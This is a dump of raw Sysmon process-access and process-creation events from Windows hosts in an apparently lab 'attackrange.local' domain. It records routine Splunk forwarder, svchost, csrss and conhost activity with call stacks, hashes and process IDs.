AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000359962Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.285{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-36ce-6013-9203-000000001100}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359961Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.285{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359960Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.285{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359959Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.285{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359958Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.285{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359957Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.285{8e433fbf-2a44-6013-0600-000000001100}756876C:\Windows\system32\csrss.exe{8e433fbf-36ce-6013-9203-000000001100}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000359956Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.285{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-36ce-6013-9203-000000001100}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000359955Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.286{8e433fbf-36ce-6013-9203-000000001100}4816C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000032686Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:30.038{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-36CE-6013-6703-00000000A401}5076C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032685Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:30.038{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032684Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:30.038{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032683Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:30.038{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032682Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:30.038{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032681Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:30.038{FF16AF91-26B4-6013-0500-00000000A401}644660C:\Windows\system32\csrss.exe{FF16AF91-36CE-6013-6703-00000000A401}5076C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032680Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:30.038{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-36CE-6013-6703-00000000A401}5076C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032679Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:30.039{FF16AF91-36CE-6013-6703-00000000A401}5076C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000032695Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.507{FF16AF91-36CF-6013-6803-00000000A401}35642596C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032694Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.351{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-36CF-6013-6803-00000000A401}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032693Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.351{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032692Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.351{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032691Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.351{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032690Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.351{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032689Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.351{FF16AF91-26B4-6013-0500-00000000A401}644760C:\Windows\system32\csrss.exe{FF16AF91-36CF-6013-6803-00000000A401}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032688Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.351{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-36CF-6013-6803-00000000A401}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032687Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:31.351{FF16AF91-36CF-6013-6803-00000000A401}3564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000359979Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:31.645{8e433fbf-36cf-6013-9403-000000001100}1019610252C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359978Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:31.488{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-36cf-6013-9403-000000001100}10196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359977Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:31.488{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000359976Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 